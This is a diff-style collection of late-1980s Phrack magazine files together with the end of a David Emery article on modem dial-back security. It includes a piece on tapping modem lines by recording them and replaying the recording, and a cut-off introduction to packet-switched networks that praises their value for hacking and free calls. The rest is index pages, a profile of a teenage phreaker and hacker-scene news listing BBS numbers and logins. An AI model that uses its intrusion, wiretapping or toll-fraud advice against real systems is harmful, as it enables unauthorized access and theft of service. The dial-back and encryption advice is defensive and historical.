penetrates system security should not depend on this sort of dial-back.
|
||||
|
||||
|
||||
Some Recommendations
|
||||
|
||||
Dial back using the same line used to dial in is not very secure and
|
||||
cannot be made completely secure with conventional modems. Use of dithered
|
||||
(random) time delays between dial in and dial back combined with allowing the
|
||||
modem to answer during the wait period (with provisions made for recognizing
|
||||
the fact that this wasn't the originated call - perhaps by checking to see if
|
||||
the modem is in originate or answer mode) will substantially reduce this
|
||||
window of vulnerability but nothing can completely eliminate it.
|
||||
|
||||
Obviously if one happens to be connected to an older caller control
|
||||
switch, using the same line for dial in and dial out isn't secure at all. It
|
||||
is easy to experimentally determine this, so it ought to be possible to avoid
|
||||
such situations.
|
||||
|
||||
Dial back using a separate line (or line and modem) for dialing out is
|
||||
much better, provided that either the dial out line is sterile (not readily
|
||||
traceable by a penetrator to the target system) or that it is a one way line
|
||||
that cannot accept incoming calls at all. Unfortunately the later technique
|
||||
is far superior to the former in most organizations as concealing the
|
||||
telephone number of dial out lines for long periods involves considerable
|
||||
risk. The author has not tried to order a dial out only telephone line, so he
|
||||
is unaware of what special charges might be made for this service or even if
|
||||
it is available.
|
||||
|
||||
A final word of warning
|
||||
|
||||
In years past it was possible to access telephone company test and
|
||||
verification trunks in some areas of the country by using mf tones from so
|
||||
called "blue boxes". These test trunks connect to special ports on telephone
|
||||
switches that allow a test connection to be made to a line that doesn't
|
||||
disconnect when the line hangs up. These test connections could be used to
|
||||
fool a dial out modem, even one on a dial out only line (since the telephone
|
||||
company needs a way to test it, they usually supply test connections to it
|
||||
even if the customer can't receive calls).
|
||||
|
||||
Access to verification and test ports and trunks has been tightened
|
||||
(they are a kind of dial-a-wiretap so it ought to be pretty difficult) but in
|
||||
any as in any system there is always the danger that someone, through
|
||||
stupidity or ignorance if not mendacity will allow a system penetrator access
|
||||
to one.
|
||||
|
||||
** Some more recent comments **
|
||||
|
||||
Since posting this I have had several people suggest use of PBX lines
|
||||
that can dial out but not be dialed into or outward WATS lines that also
|
||||
cannot be dialed. Several people have also suggested use of call forwarding
|
||||
to forward incoming calls on the dial out line to the security office. [This
|
||||
may not work too well in areas served by certain ESS's which ring the number
|
||||
from which calls are being forwarded once anyway in case someone forgot to
|
||||
cancel forwarding. Forwarding is also subject to being cancelled at random
|
||||
times by central office software reboots]
|
||||
|
||||
And since posting this I actually tried making some measurements of
|
||||
how wide the incoming call window is for the modems we use for dial in at
|
||||
CRDS. It appears to be at least 2-3 seconds for US Robotics Courier 2400 baud
|
||||
modems. I found I could defeat same-line-for-dial-out dialback quite handily
|
||||
in a few dozen tries no matter what tricks I played with timing and watching
|
||||
modem status in the dial back login software. I eventually concluded that
|
||||
short of reprogramming the micro in the modem to be smarter about monitoring
|
||||
line state, there was little I could do at the login (getty) level to provide
|
||||
much security for same line dialback.
|
||||
|
||||
Since it usually took a few tries to break in, it is possible to
|
||||
provide some slight security improvement by sharply limiting the number of
|
||||
unsuccessful callbacks per user per day so that a hacker with only a couple of
|
||||
passwords would have to try over a significant period of time.
|
||||
|
||||
Note that dialback on a dedicated dial-out only line is somewhat
|
||||
secure.
|
||||
|
||||
|
||||
David I. Emery Charles River Data Systems 617-626-1102
|
||||
983 Concord St., Framingham, MA 01701.
|
||||
uucp: decvax!frog!die
|
||||
|
||||
--
|
||||
David I. Emery Charles River Data Systems
|
||||
983 Concord St., Framingham, MA 01701 (617) 626-1102 uucp: decvax!frog!die
|
79
phrack17/9.txt
Normal file
79
phrack17/9.txt
Normal file
|
@ -0,0 +1,79 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 9 of 12 : Data-Tapping Made Easy
|
||||
|
||||
|
||||
--FEATURE ARTICLES AND REVIEWS-
|
||||
|
||||
|
||||
TAPPING COMPUTER DATA IS EASY, AND CLEARER THAN PHONE CALLS !
|
||||
|
||||
BY RIC BLACKMON, SYSOP OF A FED BBS
|
||||
|
||||
Aquired by Elric of Imrryr & Lunatic Labs UnLtd
|
||||
|
||||
Note from Elric: This file was written by the sysop of a board for computer
|
||||
security people (run on a CoCo), as far as I know the board no longer exists,
|
||||
it was being crashed by hackers too much... (hehe).
|
||||
---------------------
|
||||
|
||||
FOR SEVERAL YEARS, I ACCEPTED CERTAIN BITS OF MISINFORMATION AS
|
||||
TECHNICALLY ACCURATE, AND DIDN'T PROPERLY PURSUE THE MATTER. SEVERAL FOOLS
|
||||
GAVE ME FOOLISH INFORMATION, SUCH AS: A TAP INTERRUPTS COMPUTER DATA
|
||||
TRANSMISSIONS; DATA COULD BE PICKED UP AS RF EMANATIONS BUT IT WAS A MASS OF
|
||||
UNINTELLIGIBLE SIGNAL CAUSED BY DATA MOVING BETWEEN REGISTERS; ONE HAD TO BE
|
||||
IN 'SYNC' WITH ANY SENDING COMPUTER; DATA COULDN'T BE READ UNLESS YOU HAD A
|
||||
DIRECT MATCH IN SPEED, PARITY & BIT PATTERN; AND ONLY A COMPUTER OF THE SAME
|
||||
MAKE AND MODEL COULD READ THE SENDING COMPUTER. THIS IS ALL PLAIN SWILL. IT
|
||||
IS IN FACT, AN EASIER CHORE TO TAP A COMPUTER THAN A TELEPHONE. THE TECHNIQUE
|
||||
AND THE EQUIPMENT IS ALMOST THE SAME, BUT THE COMPUTER LINE WILL BE MORE
|
||||
ACCURATE (THE TWO COMPUTERS INVOLVED, HAVE ERROR CORRECTING PROCEDURES) AND
|
||||
CLEARER (DIGITAL TRANSMISSIONS HAVE MORE DISTINCT SIGNALS THAN ANALOG
|
||||
TRANSMISSIONS).
|
||||
|
||||
FIRST, RECOGNIZE THAT NEARLY ALL DATA TRANSMISSIONS ARE SENT IN CLEARTEXT
|
||||
ASCII SIGNALS. THE LINES CARRYING OTHER BIT-GROUPS OR ENCIPHERED TEXTS ARE
|
||||
RARE. SECOND, THE SIGNAL APPEARS ON GREEN AND RED (WIRES) OF THE PHONE LINE
|
||||
('TIP' AND 'RING'). THE DATA IS MOST LIKELY ASYNCHRONOUS SERIAL DATA MOVING
|
||||
AT 300 BAUD. NOW THAT 1200 BAUD IS BECOMING MORE CHIC, YOU CAN EXPECT TO FIND
|
||||
A GROWING USE OF THE FASTER TRANSMISSION RATE. FINALLY, YOU DON'T NEED TO
|
||||
WORRY ABOUT THE PROTOCOL OR EVEN THE BAUD RATE (SPEED) UNTIL AFTER A TAPED
|
||||
COPY OF A TRANSMISSION IS OBTAINED.
|
||||
|
||||
IN A SIMPLE EXPERIMENT, A TAPED COPY OF A DATA TRANSMISSION WAS MADE
|
||||
WITH THE CHEAPEST OF TAPE RECORDERS, TAPPING THE GREEN AND RED LINES BEYOND
|
||||
THE MODEM. THE RECORDING WAS THEN PLAYED INTO A MODEM AS THOUGH IT WERE AN
|
||||
ORIGINAL TRANSMISSION. AT THAT POINT, HAD IT BEEN NECESSARY, THE PROTOCOL
|
||||
SETTINGS ON RECEIVING TERMINAL COULD HAVE BEEN CHANGED TO MATCH THE TAPE. NO
|
||||
ADJUSTMENTS WERE NECESSARY AND A NICE, CLEAR ERROR-FREE DOCUMENT WAS RECEIVED
|
||||
ON THE ILLICIT VIDEO SCREEN AND A NEAT HARD-COPY OF THE DOCUMENT CAME OFF THE
|
||||
PRINTER. THE MESSAGE WAS INDEED CAPTURED, BUT HAD IT BEEN AN INTERCEPTION
|
||||
INSTEAD OF A SIMPLE MONITORING, IT COULD HAVE BEEN ALTERED WITH A SIMPLE WORD
|
||||
PROCESSOR PROGRAM, TO SUIT ANY PURPOSE, AND PLACED BACK ON THE WIRE.
|
||||
|
||||
WERE I TO HAVE AN INTEREST IN INFORMATION ORIGINATING FROM A
|
||||
PARTICULAR COMPANY, AGENCY, OR OFFICE, I THINK THAT I WOULD FIND IT FAR MORE
|
||||
PRODUCTIVE TO TAP A DATA TRANSMISSION THAN TO TAP A VOICE TRANSMISSION, AND
|
||||
EVEN MORE REWARDING THAN GETTING HARDCOPY DOCUMENTS.
|
||||
|
||||
*SIGNIFICANT & IMPORTANT INFORMATION IS MORE CONCENTRATED IN A DATA
|
||||
TRANSMISSION.
|
||||
*SIGNIFICANT & IMPORTANT INFORMATION IS MORE EASILY LOCATED IN DATA
|
||||
TRANSMISSIONS THAN IN MASSES OF FILES OR PHONE CALLS.
|
||||
*TRANSMITTED DATA IS PRESUMED TRUE, AND WHEN ALTERATION IS DISCOVERED,
|
||||
IT'S READILY BLAMED ON THE EQUIPMENT.
|
||||
*THE LAWS CONCERNING TAPS ON UNCLASSIFIED AND NON-FINANCIAL COMPUTER
|
||||
DATA ARE EITHER QUITE LACKING OR ABJECTLY STUPID.
|
||||
|
||||
THE POINT OF ALL THIS IS THAT THE PRUDENT MANAGER REALLY OUGHT TO ENCRYPT ALL
|
||||
DATA TRANSMISSIONS. ENCRYPTION PACKAGES ARE CHEAP (A 'DES' PROGRAM IS NOW
|
||||
PRICED AT $30) AND ARE EASY TO USE.
|
||||
|
||||
-------------------------------
|
36
phrack18/1.txt
Normal file
36
phrack18/1.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #1 of 11
|
||||
|
||||
Index
|
||||
=====
|
||||
June 7, 1988
|
||||
|
||||
Well, Phrack Inc. is still alive but have changed editors again. I,
|
||||
Crimson Death am now the new editor of Phrack Inc. The reason why I am the
|
||||
new editor is because of the previous editors in school and they did not just
|
||||
have the time for it. So, if you would like to submit an article for Phrack
|
||||
Inc. please contact: Crimson Death, Control C, or Epsilon, or call my BBS
|
||||
(The Forgotten Realm) or one of the BBSes on the sponsor BBS listing (Found in
|
||||
PWN Part 1). We are ALWAYS looking for more files to put in upcoming issues.
|
||||
Well, that about does it for me. I hope you enjoy Phrack 18 as much as we at
|
||||
The Forgotten Realm did bringing it to you. Later...
|
||||
Crimson Death
|
||||
Sysop of The Forgotten Realm
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
This issue of Phrack Inc. includes the following:
|
||||
|
||||
#1 Index of Phrack 18 by Crimson Death (02k)
|
||||
#2 Pro-Phile XI on Ax Murderer by Crimson Death (04k)
|
||||
#3 An Introduction to Packet Switched Networks by Epsilon (12k)
|
||||
#4 Primos: Primenet, RJE, DPTX by Magic Hasan (15k)
|
||||
#5 Hacking CDC's Cyber by Phrozen Ghost (12k)
|
||||
#6 Unix for the Moderate by Urvile (11k)
|
||||
#7 Unix System Security Issues by Jester Sluggo (27k)
|
||||
#8 Loop Maintenance Operating System by Control C (32k)
|
||||
#9 A Few Things About Networks by Prime Suspect (21k)
|
||||
#10 Phrack World News XVIII Part I by Epsilon (09k)
|
||||
#11 Phrack World News XVIII Part II by Epsilon (05k)
|
||||
==============================================================================
|
194
phrack18/10.txt
Normal file
194
phrack18/10.txt
Normal file
|
@ -0,0 +1,194 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #10 of 11
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN >>>>>=-* Phrack World News *-=<<<<< PWN
|
||||
PWN Issue XVIII/1 PWN
|
||||
PWN PWN
|
||||
PWN Created, Compiled, and Written PWN
|
||||
PWN By: Epsilon PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
Intro
|
||||
=====
|
||||
|
||||
Welcome to yet another issue of Phrack World News. We have once again
|
||||
returned to try and bring you an entertaining, and informative newsletter
|
||||
dedicated to the spread of information and knowledge throughout the H/P
|
||||
community.
|
||||
______________________________________________________________________________
|
||||
|
||||
TOK Re-Formed
|
||||
=============
|
||||
|
||||
A group called Tribunal Of Knowledge, which has undergone previous
|
||||
re-formations has once again re-formed. The person who is currently "in
|
||||
charge" of the group says that he had permission from High Evolutionary, the
|
||||
group's founder, to re-form the organization. Although the group hasn't
|
||||
publicly announced their existence or written any files, we should be hearing
|
||||
from them in the near future.
|
||||
|
||||
The Current Members of TOK Include -
|
||||
|
||||
Control C
|
||||
Prime Suspect
|
||||
Jack Death
|
||||
The UrVile
|
||||
The Prophet
|
||||
Psychic Warlord
|
||||
|
||||
Information Provided By Control C, and Prime Suspect.
|
||||
______________________________________________________________________________
|
||||
|
||||
Phrack Inc. Support Boards
|
||||
==========================
|
||||
|
||||
Phrack Inc. has always made it a habit to set up Phrack Inc. sponsor accounts
|
||||
on the more popular boards around. These sponsor accounts are set up, so that
|
||||
the users may get in touch with the Phrack Magazine staff if they would like
|
||||
to contribute an article, or any other information to our publication. Please
|
||||
take note of the boards on which Phrack Inc. accounts are set up. Thank you.
|
||||
|
||||
The Current List of Phrack Inc. Sponsor Boards Includes -
|
||||
|
||||
P-80 Systems - 304/744-2253
|
||||
OSUNY - 914/725-4060
|
||||
The Central Office - 914/234-3260
|
||||
Digital Logic's DS - 305/395-6906
|
||||
The Forgotten Realm - 618/943-2399 *
|
||||
|
||||
* - Phrack Headquarters
|
||||
______________________________________________________________________________
|
||||
|
||||
SummerCon '88 Preliminary Planning
|
||||
==================================
|
||||
|
||||
Planning for SummerCon '88 is underway. So far, we have decided on four
|
||||
tentative locations: New York City, Saint Louis, Atlanta, or Florida. Since
|
||||
this is only tentative, no dates have been set or reservations made for a
|
||||
conference.
|
||||
|
||||
If you have any comments, suggestions, etc, please let us know. If you are
|
||||
planning to attend SummerCon '88, please let us know as well. Thank you.
|
||||
|
||||
Information Provided By The Forgotten Realm.
|
||||
______________________________________________________________________________
|
||||
|
||||
LOD/H Technical Journal
|
||||
=======================
|
||||
|
||||
Lex Luthor of LOD/H (Legion of Doom/Hackers) has been busy with school, etc.,
|
||||
so he has not had the time, nor the initiative to release the next issue of
|
||||
the LOD/H Technical Journal. On this note, he has tentatively turned the
|
||||
Journal over to Phantom Phreaker, who will probably be taking all
|
||||
contributions for the Journal. No additional information is available.
|
||||
|
||||
Information Provided By The UrVile and Phantom Phreaker.
|
||||
______________________________________________________________________________
|
||||
|
||||
Congress To Restrict 976/900 Dial-A-Porn Services
|
||||
=================================================
|
||||
|
||||
Congress is considering proposals to restrict dial-up services in an effort to
|
||||
make it difficult for minors to access sexually explicit messages. A
|
||||
House-Senate committee is currently negotiating the "dial-a-porn" proposal.
|
||||
Lawmakers disagree whether or not the proposal is constitutional and are
|
||||
debating the issue of requiring phone companies to offer a service that would
|
||||
allow parents, free of charge, to block the 976/900 services. Other proposals
|
||||
would require customers to pay in advance or use credit cards to access the
|
||||
976/900 services.
|
||||
|
||||
Some companies are currently offering free services that restrict minors from
|
||||
accessing sexually explicit messages. AT&T and Department of Justice
|
||||
officials are cooperating in a nationwide crackdown of "dial-a-porn" telephone
|
||||
companies. The FCC recently brought charges against one of AT&T's largest 900
|
||||
Service customers, and AT&T provided the confidential information necessary in
|
||||
the prosecution. AT&T also agreed to suspend or disconnect services of
|
||||
companies violating the commission ban by transmitting obscene or indecent
|
||||
messages to minors.
|
||||
______________________________________________________________________________
|
||||
|
||||
Some Hope Left For Victims Of FGD
|
||||
=================================
|
||||
|
||||
US Sprint's famed FGD (Feature Group D) dial-ups and 800 INWATS exchanges may
|
||||
pose no threat to individuals under switches that do not yet offer equal
|
||||
access service to alternate long distance carriers. Due to the way Feature
|
||||
Group D routes its information, the ten-digit originating number of the caller
|
||||
is not provided when the call is placed from a non-equal access area. The
|
||||
following was taken from an explanation of US Sprint's 800 INWATS Service.
|
||||
|
||||
*************************************************************
|
||||
|
||||
CALL DETAIL
|
||||
|
||||
*************************************************************
|
||||
|
||||
With US Sprint 800 Service, a customer will receive call detail information
|
||||
for every call on every invoice. The call detail for each call includes:
|
||||
|
||||
o Date of call
|
||||
o Time of call
|
||||
o The originating city and state
|
||||
o The ten-digit number of the caller if the call originates in an
|
||||
equal access area or the NPA of the caller if the non-equal access
|
||||
area.
|
||||
o Band into which the call falls
|
||||
o Duration of the call in minutes
|
||||
o Cost of the call
|
||||
|
||||
This came directly from US Sprint. Do as you choose, but don't depend on
|
||||
this.
|
||||
|
||||
Information Provided by US Sprint.
|
||||
______________________________________________________________________________
|
||||
|
||||
Telenet Bolsters Network With Encryption
|
||||
========================================
|
||||
|
||||
Telenet Communications Corporation strengthened its public data network
|
||||
recently with the introduction of data encryption capability.
|
||||
|
||||
The X.25 Encryption Service provides a type of data security previously
|
||||
unavailable on any public data network, according to analysts. For Telenet,
|
||||
the purpose of the offering is "to be more competitive; nobody else does
|
||||
this," according to Belden Menkus, an independent network security consultant
|
||||
based in Middleville, NJ.
|
||||
|
||||
The service is aimed at users transmitting proprietary information between
|
||||
host computers, such as insurance or fund-transfer applications. It is priced
|
||||
at $200 per month per host computer connection. Both the confidentiality and
|
||||
integrity of the data can be protected via encryption.
|
||||
|
||||
The scheme provides end-to-end data encryption, an alternative method whereby
|
||||
data is decrypted and recrypted at each node in the network. "This is a
|
||||
recognition that end-to-end encryption is really preferable to link
|
||||
encryption," Menkus said.
|
||||
|
||||
The service is available over both dial-up and leased lines, and it supports
|
||||
both synchronous and asynchronous traffic at speeds up to 9.6K BPS.
|
||||
|
||||
Telenet has approved one particular data encryption device for use with the
|
||||
service, The Cipher X 5000, from Technical Communications Corporation (TCC), a
|
||||
Concord, Massachusetts based vendor. TCC "has been around the data encryption
|
||||
business for quite a while," Menkus said.
|
||||
|
||||
The Cipher X implements the National Bureau of Standards' Data Encryption
|
||||
Standard (DES). DES is an algorithm manipulated by a secret 56 bit key.
|
||||
Computers protected with the device can only be accessed by users with a
|
||||
matching key.
|
||||
|
||||
The data encryptor is installed at user sites between the host computer and
|
||||
the PAD (Packet Assembler/Disassembler).
|
||||
|
||||
Installation of the TCC device does not affect the user's ability to send
|
||||
non-encrypted data, according to Telenet. By maintaining a table of network
|
||||
addresses that require encryption, the device decides whether or not to
|
||||
encrypt each transmission.
|
||||
|
||||
Information Provided by Network World.
|
||||
______________________________________________________________________________
|
||||
==============================================================================
|
106
phrack18/11.txt
Normal file
106
phrack18/11.txt
Normal file
|
@ -0,0 +1,106 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #11 of 11
|
||||
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
PWN PWN
|
||||
PWN >>>>>=-* Phrack World News *-=<<<<< PWN
|
||||
PWN Issue XVIII/2 PWN
|
||||
PWN PWN
|
||||
PWN Created By Knight Lightning PWN
|
||||
PWN PWN
|
||||
PWN Compiled and Written PWN
|
||||
PWN by Epsilon PWN
|
||||
PWN PWN
|
||||
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
||||
|
||||
|
||||
Intro
|
||||
=====
|
||||
|
||||
It seems that there is yet some things to be covered. In addendum, we will be
|
||||
featuring, as a part of PWN, a special section where up-and-coming H/P
|
||||
Bulletin Boards can be advertised. This will let everyone know where the
|
||||
board scene stands. If you have a board that you feel has potential, but
|
||||
doesn't have good users, let us know. Thanks.
|
||||
______________________________________________________________________________
|
||||
|
||||
Doctor Cypher Busted?
|
||||
=====================
|
||||
|
||||
Doctor Cypher, who frequents the Altos Chat, The Dallas Hack Shack, Digital
|
||||
Logic's Data Service, The Forgotten Realm, P-80 Systems, and others, is
|
||||
believed to have had his modem confiscated by "Telephone Company Security,"
|
||||
and by his local Sheriff. No charges have been filed as of this date. He
|
||||
says he will be using a friend's equipment to stay in touch with the world.
|
||||
|
||||
Information Provided by Hatchet Molly
|
||||
______________________________________________________________________________
|
||||
|
||||
Give These Boards A Call
|
||||
========================
|
||||
|
||||
These systems have potential, but need good users, so give them a call, and
|
||||
help the world out.
|
||||
|
||||
The Autobahn - The Outlet Private -
|
||||
|
||||
703/629-4422 313/261-6141
|
||||
Primary - 'central' newuser/kenwood
|
||||
Sysop - The Highwayman Sysop - Ax Murderer
|
||||
Hack/Phreak Private Hack/Phreak
|
||||
|
||||
Dallas Hack Shack - The Forgotten Realm -
|
||||
|
||||
214/422-4307 618/943-2399
|
||||
Apply For Access Apply For Access
|
||||
Sysop - David Lightman Sysop - Crimson Death
|
||||
Private Hack/Phreak Private H/P & Phrack Headquarters
|
||||
______________________________________________________________________________
|
||||
|
||||
AllNet Hacking Is Getting Expensive
|
||||
===================================
|
||||
|
||||
For those of you who hack AllNet Long Distance Service, watch out. AllNet
|
||||
Communications Corp. has announced that they will be charging $500.00 PER
|
||||
ATTEMPT to hack their service. That's not PER VALID CODE, that's PER ATTEMPT.
|
||||
Sources say that The Fugitive (619) received a $200,000.00 phone bill from
|
||||
AllNet.
|
||||
|
||||
This may set examples for other long distance communication carriers in the
|
||||
future, so be careful what you do.
|
||||
______________________________________________________________________________
|
||||
|
||||
Editorial - What Is The Best Way To Educate New Hackers?
|
||||
========================================================
|
||||
|
||||
Since the "demise" of Phreak Klass 2600 and PLP, the H/P world has not seen a
|
||||
board dedicated to the education of new hackers. Although PK2600 is still up
|
||||
(806/799-0016, educate) many of the old "teachers" never call. The board has
|
||||
fallen mainly to new hackers who are looking for teachers. This may pose a
|
||||
problem. If boards aren't the way to educate these people (I think they are
|
||||
the best way, in fact), then what is? Certainly not giant Alliance
|
||||
conferences as in the past, due to recent "black-listing" of many "conferees"
|
||||
who participated heavily in Alliance Teleconferencing in the past.
|
||||
|
||||
I think it might be successful if someone was able to set up another board
|
||||
dedicated to teaching new hackers. A board which is not private, but does
|
||||
voice validate the users as they login. Please leave some feedback as to what
|
||||
you think of this idea, or if you are willing to set this type of system up.
|
||||
Thanks.
|
||||
______________________________________________________________________________
|
||||
|
||||
US Sprint Employee Scam
|
||||
=======================
|
||||
|
||||
The US Sprint Security Department is currently warning employees of a scam
|
||||
which could be affecting them. An unidentified man has been calling various
|
||||
employees throughout the US Sprint system and telling them that if they give
|
||||
him their FON Card numbers, they will receive an additional US Sprint employee
|
||||
long-distance credit. The Security Department says, "this is a 100 percent
|
||||
scam." "If you're called to take part in this operation, please call the
|
||||
Security Department at (816)822-6217."
|
||||
|
||||
Information Provided By US Sprint
|
||||
______________________________________________________________________________
|
||||
|
94
phrack18/2.txt
Normal file
94
phrack18/2.txt
Normal file
|
@ -0,0 +1,94 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #2 of 11
|
||||
|
||||
==Phrack Pro-Phile XI==
|
||||
|
||||
Written and Created by Crimson Death
|
||||
|
||||
Welcome to Phrack Pro-Phile XI. Phrack Pro-Phile is created to bring info
|
||||
to you, the users, about old or highly important/controversial people. This
|
||||
month, I bring to you a name familiar to most in the BBS world...
|
||||
|
||||
Ax Murderer
|
||||
===========
|
||||
|
||||
Ax Murderer is popular to many of stronger names in the P/H community.
|
||||
------------------------------------------------------------------------------
|
||||
Personal
|
||||
========
|
||||
Handle: Ax Murderer
|
||||
Call him: Mike
|
||||
Past handles: None
|
||||
Handle origin: Thought of it while on CompuServe.
|
||||
Date of Birth: 10/04/72
|
||||
Age at current date: 15
|
||||
Height: 6' 2''
|
||||
Weight: 205 Lbs.
|
||||
Eye color: Brown
|
||||
Hair Color: Brown
|
||||
Computers: IBM PC, Apple II+, Apple IIe
|
||||
Sysop/Co-Sysop of: The Outlet Private, Red-Sector-A, The Autobahn
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Ax Murderer started phreaking and hacking in 1983 through the help of some
|
||||
of his friends. Members of the Hack/Phreak world which he has met include
|
||||
Control C, Bad Subscript, The Timelord. Some of the memorable phreak/hack
|
||||
BBS's he was/is on included WOPR, OSUNY, Plovernet, Pirate 80, Shadow Spawn,
|
||||
Metal Shop Private, Sherwood Forest (213), IROC, Dragon Fire, and Shadowland.
|
||||
His phreaking and hacking knowledge came about with a group of people in which
|
||||
some included Forest Ranger and The Timelord.
|
||||
|
||||
Ax Murderer is a little more interested in Phreaking than hacking. He
|
||||
does like to program however, he can program in 'C', Basic, Pascal, and
|
||||
Machine Language.
|
||||
|
||||
The only group in which Ax Murderer has been in is Phoneline Phantoms.
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Interests: Telecommunications (Modeming, phreaking, hacking,
|
||||
programming), football, track, cars, and music.
|
||||
|
||||
Ax Murderer's Favorite Thing
|
||||
----------------------------
|
||||
|
||||
His car... (A Buick Grand National)
|
||||
His gilrfriend... (Sue)
|
||||
Rock Music
|
||||
|
||||
Most Memorable Experiences
|
||||
--------------------------
|
||||
|
||||
Newsweek Incident with Richard Sandza (He was the Judge for the tele-trial)
|
||||
|
||||
Some People to Mention
|
||||
----------------------
|
||||
|
||||
Forest Ranger (For introducing me to everyone and getting me on Dragon Fire)
|
||||
Taran King (For giving me a chance on MSP and the P/H world)
|
||||
Mind Bender (For having ANY utilities I ever needed)
|
||||
The Necromancer (Getting me my Apple'cat)
|
||||
The Titan (Helping me program the BBS)
|
||||
|
||||
All for being friends and all around good people and phreaks.
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Ax Murderer is out and out against the idea of the destruction of data.
|
||||
He hated the incident with MIT where the hackers were just hacking it to
|
||||
destroy files on the system. He says that it ruins it for the everyone else
|
||||
and gives 'True Hackers' a bad name. He hates it when people hack to destroy,
|
||||
Ax has no respect for anyone who does this today. Where have all the good
|
||||
times gone?
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
I hope you enjoyed this phile, look forward to more Phrack Pro-Philes coming
|
||||
in the near future.... And now for the regularly taken poll from all
|
||||
interviewees.
|
||||
|
||||
Of the general population of phreaks you have met, would you consider most
|
||||
phreaks, if any, to be computer geeks? "No, not really." Thanks Mike.
|
||||
|
||||
Crimson Death
|
||||
Sysop of The Forgotten Realm
|
||||
==============================================================================
|
214
phrack18/3.txt
Normal file
214
phrack18/3.txt
Normal file
|
@ -0,0 +1,214 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #3 of 11
|
||||
|
||||
_ _ _ _ _____________________________________________ _ _ _ _
|
||||
_-_-_-_- -_-_-_-_
|
||||
_-_-_-_- An Introduction To -_-_-_-_
|
||||
_-_-_-_- -_-_-_-_
|
||||
_-_-_-_- Packet Switched Networks -_-_-_-_
|
||||
_-_-_-_- -_-_-_-_
|
||||
_-_-_-_- -_-_-_-_
|
||||
_-_-_-_- -_-_-_-_
|
||||
_-_-_-_- Written By - Revised - -_-_-_-_
|
||||
_-_-_-_- -_-_-_-_
|
||||
_-_-_-_- Epsilon 05/3/88 -_-_-_-_
|
||||
_-_-_-_-_____________________________________________-_-_-_-_
|
||||
|
||||
|
||||
Preface -
|
||||
|
||||
In the past few years, Packet Switched Networks have become a prominent
|
||||
feature in the world of telecommunications. These networks have provided ways
|
||||
of communicating with virtually error-free data, over very large distances.
|
||||
These networks have become an imperative to many a corporation in the business
|
||||
world. In this file we will review some of the basic aspects of Packet
|
||||
Switched Networks.
|
||||
|
||||
Advantages -
|
||||
|
||||
The Packet Switched Network has many advantages to the common user, and
|
||||
even more to the hacker, which will be reviewed in the next topic.
|
||||
|
||||
The basis of a Packet Switched Network is the Packet Switch. This network
|
||||
enables the service user to connect to any number of hosts via a local POTS
|
||||
dial-up/port. The various hosts pay to be connected to this type of network,
|
||||
and that's why there is often a surcharge for connection to larger public
|
||||
services like Compuserve or The Source.
|
||||
|
||||
A Packet Switched Network provides efficient data transfer and lower rates
|
||||
than normal circuit switched calls, which can be a great convenience if you
|
||||
are planning to do a lot of transferring of files between you and the host.
|
||||
|
||||
Not only is the communication efficient, it is virtually error free.
|
||||
Whereas in normal circuit switched calls, there could be a drastic increase in
|
||||
errors, thus creating a bad transfer of data.
|
||||
|
||||
When using a Packet Switched Network, it is not important that you
|
||||
communicate at the same baud rate as your host. A special device regulates
|
||||
the speed so that the individual packets are sped up or slowed down, according
|
||||
to your equipment. Such a device is called a PAD (Packet Assembler
|
||||
Disassembler).
|
||||
|
||||
A PSN also provides access to a variety of information and news retrieval
|
||||
services. The user pays nothing for these calls, because the connections are
|
||||
collect. Although the user may have to subscribe to the service to take
|
||||
advantage of it's services, the connection is usually free, except for a
|
||||
surcharge on some of the larger subscription services.
|
||||
|
||||
Advantages To Hackers -
|
||||
|
||||
Packet Switched Networks, to me, are the best thing to come along since the
|
||||
phone system. I'm sure many other hackers feel the same way. One of the
|
||||
reasons for this opinion is that when hacking a system, you need not dial out
|
||||
of your LATA, using codes or otherwise.
|
||||
|
||||
Now, the hacker no longer has to figure out what parameters he has to set
|
||||
his equipment to, to communicate with a target computer effectively. All
|
||||
PSSes use the same protocol, set by international standards. This protocol is
|
||||
called X.25. This protocol is used on every network-to-network call in the
|
||||
world.
|
||||
|
||||
When operating on a packet switch, you are not only limited to your own
|
||||
network (As if that wasn't enough already). You can access other PSSes or
|
||||
private data networks through gateways which are implemented in your PSN.
|
||||
There are gateways to virtually every network, from virtually every other
|
||||
network, except for extremely sensitive or private networks, in which case
|
||||
would probably be completely isolated from remote access.
|
||||
|
||||
Another advantage with PSNs is that almost everyone has a local port, which
|
||||
means if you have an outdial (Next paragraph), you can access regular circuit
|
||||
switched hosts via your local Packet Switched Network port. Since the ports
|
||||
are local, you can spend as much time as you want on it for absolutely no
|
||||
cost. So think about it. Access to any feasible network, including overseas
|
||||
PSNs and packet switches, access to almost any host, access to normal circuit
|
||||
switched telephone-reachable hosts via an outdial, and with an NUI (Network
|
||||
User Identity - Login and password entered at the @ prompt on Telenet),
|
||||
unlimited access to any NUA, reverse-charged or not.
|
||||
|
||||
Due to the recent abuse of long distance companies, the use of codes when
|
||||
making free calls is getting to be more and more hazardous. You may ask, 'Is
|
||||
there any resort to making free calls without using codes, and without using a
|
||||
blue box?' The answer is yes, but only when using data. With an outdial,
|
||||
accessible from your local PSN port, you can make data calls with a remote
